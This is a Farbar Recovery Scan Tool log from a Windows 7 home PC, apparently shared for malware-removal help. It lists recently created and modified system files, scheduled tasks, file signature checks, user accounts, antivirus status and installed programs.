2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:59 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:51 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe

2016-10-15 15:28 - 2016-09-09 07:51 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys

2016-10-15 15:28 - 2016-09-09 07:51 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe

2016-10-15 15:28 - 2016-09-09 07:48 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe

2016-10-15 15:28 - 2016-09-09 07:47 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe

2016-10-15 15:28 - 2016-09-09 07:43 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe

2016-10-15 15:28 - 2016-09-09 07:38 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe

2016-10-15 15:28 - 2016-09-09 07:38 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll

2016-10-15 15:28 - 2016-09-09 07:38 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe

2016-10-15 15:28 - 2016-09-09 07:38 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe

2016-10-15 15:28 - 2016-09-09 07:37 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:37 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:37 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll

2016-10-15 15:28 - 2016-09-09 07:37 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll

2016-10-15 15:28 - 2016-09-08 10:34 - 00263680 _____ (Microsoft Corporation) C:\Windows\system32\WebClnt.dll

2016-10-15 15:28 - 2016-09-08 10:34 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WebClnt.dll

2016-10-15 15:28 - 2016-09-08 10:34 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\davclnt.dll

2016-10-15 15:28 - 2016-09-08 10:34 - 00087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\davclnt.dll

2016-10-15 15:28 - 2016-09-08 04:55 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys

2016-10-15 15:28 - 2016-09-08 04:55 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys

2016-10-15 15:18 - 2016-07-22 04:58 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe

2016-10-15 15:18 - 2016-07-22 04:51 - 00123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe

2016-10-09 22:51 - 2016-09-12 11:17 - 00077032 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe

2016-10-09 22:51 - 2016-09-12 11:08 - 01226752 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll

2016-10-09 22:51 - 2016-09-09 05:54 - 01629184 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll

2016-10-09 22:51 - 2016-09-09 05:54 - 00586752 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll

2016-10-09 22:51 - 2016-09-09 05:54 - 00575488 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll

2016-10-09 22:51 - 2016-09-09 05:54 - 00314368 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll

2016-10-09 22:51 - 2016-09-09 05:54 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll

2016-10-09 22:51 - 2016-09-09 05:54 - 00224256 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll

2016-10-09 22:51 - 2016-09-09 05:54 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll

2016-10-09 22:11 - 2016-08-29 05:31 - 14183424 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll

2016-10-09 22:11 - 2016-08-29 05:31 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll

2016-10-09 22:11 - 2016-08-29 05:31 - 01867776 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll

2016-10-09 22:11 - 2016-08-29 05:12 - 12880384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll

2016-10-09 22:11 - 2016-08-29 05:12 - 01806848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll

2016-10-09 22:11 - 2016-08-29 05:12 - 01499648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExplorerFrame.dll

2016-10-09 22:11 - 2016-08-29 05:04 - 03229696 _____ (Microsoft Corporation) C:\Windows\explorer.exe

2016-10-09 22:11 - 2016-08-29 04:55 - 02972672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe

2016-10-09 22:11 - 2016-08-16 10:40 - 00343552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys

2016-10-09 22:11 - 2016-08-16 10:40 - 00327168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys

2016-10-09 22:11 - 2016-08-16 10:40 - 00099840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys

2016-10-09 22:11 - 2016-08-16 10:40 - 00056320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys

2016-10-09 22:11 - 2016-08-16 10:40 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys

2016-10-09 22:11 - 2016-08-16 10:40 - 00025600 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbohci.sys

2016-10-09 22:11 - 2016-08-16 10:40 - 00007808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys

2016-10-09 22:11 - 2016-08-12 07:02 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll

2016-10-09 22:11 - 2016-08-12 07:02 - 12574720 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL

2016-10-09 22:11 - 2016-08-12 07:02 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll

2016-10-09 22:11 - 2016-08-12 07:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx

2016-10-09 22:11 - 2016-08-12 07:02 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll

2016-10-09 22:11 - 2016-08-12 06:47 - 12574208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL

2016-10-09 22:11 - 2016-08-12 06:47 - 11410432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll

2016-10-09 22:11 - 2016-08-12 06:31 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll

2016-10-09 22:11 - 2016-08-12 06:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx

2016-10-09 22:11 - 2016-08-12 06:31 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll

2016-10-09 22:11 - 2016-08-12 06:26 - 00461312 _____ (Microsoft Corporation) C:\Windows\system32\scavengeui.dll

2016-10-09 22:11 - 2016-08-06 05:31 - 02023424 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll

2016-10-09 22:11 - 2016-08-06 05:31 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll

2016-10-09 22:11 - 2016-08-06 05:31 - 00310784 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll

2016-10-09 22:11 - 2016-08-06 05:31 - 00182272 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll

2016-10-09 22:11 - 2016-08-06 05:31 - 00054272 _____ (Microsoft Corporation) C:\Windows\system32\WsmRes.dll

2016-10-09 22:11 - 2016-08-06 05:31 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\wsmplpxy.dll

2016-10-09 22:11 - 2016-08-06 05:15 - 01178112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll

2016-10-09 22:11 - 2016-08-06 05:15 - 00249344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll

2016-10-09 22:11 - 2016-08-06 05:15 - 00214016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll

2016-10-09 22:11 - 2016-08-06 05:15 - 00146944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll

2016-10-09 22:11 - 2016-08-06 05:15 - 00054272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmRes.dll

2016-10-09 22:11 - 2016-08-06 05:01 - 00266752 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe

2016-10-09 22:11 - 2016-08-06 05:01 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\wsmprovhost.exe

2016-10-09 22:11 - 2016-08-06 04:53 - 00199168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe

2016-10-09 22:11 - 2016-08-06 04:53 - 00012288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmprovhost.exe

2016-10-09 22:11 - 2016-08-06 04:53 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmplpxy.dll

2016-10-09 22:11 - 2016-06-14 07:21 - 00094440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys

2016-10-09 22:11 - 2016-06-14 07:16 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 01573888 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 01483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00680448 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00632320 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00499712 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00433152 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00295936 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00228864 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00081920 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00008704 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll

2016-10-09 22:11 - 2016-06-14 07:16 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll

2016-10-09 22:11 - 2016-06-14 07:11 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys

2016-10-09 22:11 - 2016-06-14 05:21 - 03209216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00442368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00195072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll

2016-10-09 22:11 - 2016-06-14 05:21 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll

2016-10-09 22:11 - 2016-06-14 05:15 - 00125952 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe

2016-10-09 22:11 - 2016-06-14 05:15 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe

2016-10-09 22:11 - 2016-06-14 05:15 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe

2016-10-09 22:11 - 2016-06-14 05:05 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe

2016-10-09 22:11 - 2016-06-14 05:05 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe

2016-10-09 22:11 - 2016-06-14 05:00 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\pcawrk.exe

2016-10-09 22:11 - 2016-06-14 05:00 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\pcalua.exe

2016-09-27 23:41 - 2016-09-28 00:49 - 00000000 ____D C:\Users\Wayne\Desktop\tabieats

2016-09-25 11:39 - 2016-10-09 22:34 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

2016-09-25 10:52 - 2016-09-25 10:52 - 00000259 _____ C:\Users\Wayne\Desktop\Directions for Archiving (Dubbing) From VHS Tape to DVD Disc - ArchivingCartDirections.pdf.URL

2016-09-25 10:50 - 2016-09-25 10:50 - 00000266 _____ C:\Users\Wayne\Desktop\How to convert video to DVD convert VHS to digital - How-To - PC Advisor.URL

2016-09-25 10:45 - 2016-09-25 10:45 - 00709731 _____ C:\Users\Wayne\Desktop\Converting VHS Tapes to DVD_ A First-Hand Experience _ explora.pdf

2016-09-25 10:40 - 2016-09-25 10:40 - 00000303 _____ C:\Users\Wayne\Desktop\Converting VHS Tapes to DVD A First-Hand Experience explora.URL

2016-09-25 10:40 - 2016-08-12 06:26 - 00464896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys

2016-09-25 10:40 - 2016-08-12 06:26 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys

2016-09-25 10:40 - 2016-08-12 06:26 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys

2016-09-25 10:34 - 2016-08-05 05:30 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll

2016-09-25 10:34 - 2016-08-05 05:13 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll

2016-09-25 10:33 - 2016-08-16 07:36 - 01009152 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll

2016-09-25 10:33 - 2016-08-15 16:48 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll

2016-09-25 10:33 - 2016-08-06 05:31 - 00877056 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll

2016-09-25 10:33 - 2016-08-06 05:15 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll

2016-09-25 10:27 - 2016-09-25 10:27 - 00000383 _____ C:\Users\Wayne\Desktop\why does recording stop when copying vhs tape with many recording segments - Google Search.URL

2016-09-25 10:27 - 2016-09-25 10:27 - 00000243 _____ C:\Users\Wayne\Desktop\VHS to DVD Copy Keeps Stopping - Club Myce.URL

 

==================== One Month Modified files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2016-10-16 11:42 - 2009-07-13 18:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

2016-10-16 11:42 - 2009-07-13 18:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

2016-10-16 11:10 - 2011-10-23 13:51 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job

2016-10-16 11:08 - 2013-09-01 11:09 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job

2016-10-16 09:43 - 2016-04-28 18:44 - 00000000 ____D C:\QUARANTINE

2016-10-16 09:40 - 2011-10-23 13:51 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job

2016-10-16 09:39 - 2011-11-11 17:49 - 00000528 _____ C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job

2016-10-16 09:39 - 2011-11-11 17:49 - 00000466 _____ C:\Windows\Tasks\SystemToolsDailyTest.job

2016-10-16 09:39 - 2009-07-13 19:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT

2016-10-16 08:54 - 2011-11-11 17:49 - 00003488 _____ C:\Windows\System32\Tasks\SystemToolsDailyTest

2016-10-16 08:54 - 2011-11-11 17:49 - 00003448 _____ C:\Windows\System32\Tasks\PCDEventLauncher

2016-10-15 22:00 - 2014-09-20 20:59 - 00000000 ____D C:\ProgramData\APN

2016-10-15 16:43 - 2011-10-23 13:23 - 00000000 ____D C:\ProgramData\Lenovo

2016-10-15 16:34 - 2016-07-23 01:01 - 00000984 _____ C:\Users\Wayne\Desktop\PotPlayer 64 bit.lnk

2016-10-15 16:07 - 2013-09-01 11:42 - 00000000 ____D C:\Windows\System32\Tasks\TVT

2016-10-15 16:06 - 2011-10-23 13:43 - 00000000 ___HD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo ThinkVantage Tools

2016-10-15 16:06 - 2011-10-23 13:42 - 00000000 ____D C:\Program Files (x86)\Lenovo

2016-10-15 16:00 - 2009-07-13 19:13 - 00782510 _____ C:\Windows\system32\PerfStringBackup.INI

2016-10-15 16:00 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\inf

2016-10-15 15:53 - 2013-03-30 17:55 - 00000000 ____D C:\Program Files\Microsoft Silverlight

2016-10-15 15:53 - 2013-03-30 17:55 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight

2016-10-15 15:53 - 2009-07-13 18:45 - 00408216 _____ C:\Windows\system32\FNTCACHE.DAT

2016-10-15 15:41 - 2013-09-01 10:57 - 00000000 ____D C:\Windows\system32\MRT

2016-10-15 15:32 - 2011-11-19 20:17 - 143495576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe

2016-10-15 15:31 - 2013-03-30 17:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight

2016-10-15 15:08 - 2014-09-20 21:04 - 00000000 ____D C:\Users\Wayne\AppData\Local\Adobe

2016-10-15 15:08 - 2013-09-01 11:09 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater

2016-10-15 15:07 - 2012-04-25 21:53 - 00796352 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe

2016-10-15 15:07 - 2011-11-19 20:14 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

2016-10-15 15:07 - 2011-11-19 20:14 - 00000000 ____D C:\Windows\SysWOW64\Macromed

2016-10-15 15:07 - 2011-11-19 20:14 - 00000000 ____D C:\Windows\system32\Macromed

2016-10-15 15:02 - 2014-12-29 11:18 - 00002206 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

2016-10-15 14:59 - 2013-10-10 21:12 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk

2016-10-15 14:58 - 2015-07-19 08:51 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task

2016-10-09 22:55 - 2014-12-29 10:58 - 00000000 ____D C:\Windows\system32\appraiser

2016-10-09 22:55 - 2014-05-24 17:12 - 00000000 ___SD C:\Windows\system32\CompatTel

2016-10-09 22:35 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\SysWOW64\Dism

2016-10-09 22:35 - 2009-07-13 17:20 - 00000000 ____D C:\Windows\system32\Dism

2016-10-09 22:34 - 2013-03-30 18:24 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service

2016-10-09 22:20 - 2014-02-23 21:37 - 00775124 _____ C:\Windows\SysWOW64\PerfStringBackup.INI

 

==================== Files in the root of some directories =======

 

2014-07-09 13:01 - 2014-07-09 13:01 - 0022976 _____ (Intel Corporation) C:\Users\Wayne\AppData\Roaming\JomCap.dll

2015-05-07 23:03 - 2015-05-07 23:05 - 0030877 _____ () C:\Users\Wayne\AppData\Local\WiDiSetupLog.20150507.230312.wdl

 

==================== Bamital & volsnap ======================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\SysWOW64\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\dnsapi.dll => File is digitally signed

C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

 

 

LastRegBack: 2015-05-12 20:50

 

==================== End of FRST.txt ============================

 

Here is the result of the FRST (scan) Addition.txt file:

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-10-2016

Ran by Wayne (16-10-2016 12:00:26)

Running from C:\Users\Wayne\Desktop

Windows 7 Home Premium Service Pack 1 (X64) (2011-11-12 03:49:14)

Boot Mode: Normal

==========================================================

 

 

==================== Accounts: =============================

 

Administrator (S-1-5-21-3902107189-2783423906-2191778952-500 - Administrator - Disabled)

Guest (S-1-5-21-3902107189-2783423906-2191778952-501 - Limited - Disabled)

HomeGroupUser$ (S-1-5-21-3902107189-2783423906-2191778952-1002 - Limited - Enabled)

Wayne (S-1-5-21-3902107189-2783423906-2191778952-1000 - Administrator - Enabled) => C:\Users\Wayne

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: McAfee VirusScan Enterprise (Disabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AS: McAfee VirusScan Enterprise Antispyware Module (Disabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}

 

==================== Installed Programs ======================

 

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 21.0.0.198 - Adobe Systems Incorporated)

Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.185 - Adobe Systems Incorporated)

Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.185 - Adobe Systems Incorporated)

Adobe Reader XI (11.0.18) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.18 - Adobe Systems Incorporated)

